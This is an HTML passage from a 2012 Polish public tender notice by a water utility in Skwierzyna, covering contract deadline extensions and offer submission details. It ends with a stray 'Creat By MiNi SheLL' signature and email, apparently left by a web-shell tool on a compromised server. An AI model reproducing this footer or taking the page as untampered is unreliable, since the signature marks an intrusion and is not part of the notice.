   na numer (95) 71-71-541  lub doręczonym do rąk Inspektora 
   Nadzoru o okolicznościach mogących spowodować niewywiązanie się przez 
   Wykonawcę z terminu wykonywania Robót Budowlanych i wykazać wpływ tych 
   okoliczności na przesunięcie tego terminu oraz przewidywany czas takiego 
   przesunięcia. Okoliczności wskazane w zawiadomieniu Wykonawcy powyższe 
   powinny zostać ponadto udokumentowane przez Wykonawcę odpowiednim wpisem 
   w dzienniku budowy, określającym datę wystąpienia przeszkody, jej charakter oraz 
   przewidywany czas trwania. W razie spełnienia powyższych obowiązków termin 
   zakończenia przedmiotu umowy ulega przedłużeniu o czas, w jakim okoliczności 
   wskazane powyżej, wykluczają lub przedłużają prowadzenie przez Wykonawcę 
   Robót Budowlanych pod warunkiem jednakże, iż zmiana terminu zostanie uprzednio 
   na piśmie zaakceptowana przez Zamawiającego. 
4.Strony uzgodnią w drodze pisemnego aneksu do niniejszej Umowy zmiany terminu 
   wykonania Robót Budowlanych lub zakończenia wykonania Robót Budowlanych w 
   przypadku zmian w zakresie Robót Budowlanych wprowadzonych przez 
   Zamawiającego lub zlecenia Wykonawcy Robót Zamiennych/Robót Dodatkowych, 
   których wprowadzenie, ze względów technicznych lub wykonawczych, 
   uniemożliwia dotrzymanie terminu umownego.
   Opis istotnych postanowień jakie zostaną wprowadzone w treści umowy w 
   rozdziale XIII SIWZ oraz w projekcie umowy załącznik nr 7 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik.skwierzyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zakładu Wodociągów i Kanalizacji Sp. z o.o. w Skwierzynie
ul. Chrobrego 5, 66-440 Skwierzyna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2012 godzina 11:30, miejsce: Nie przewiduje się konieczności składania wniosków o dopuszczenie do udziału w postępowaniu. Wskazany termin jest ostatecznym terminem złożenia oferty w siedzibie zamawiającego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com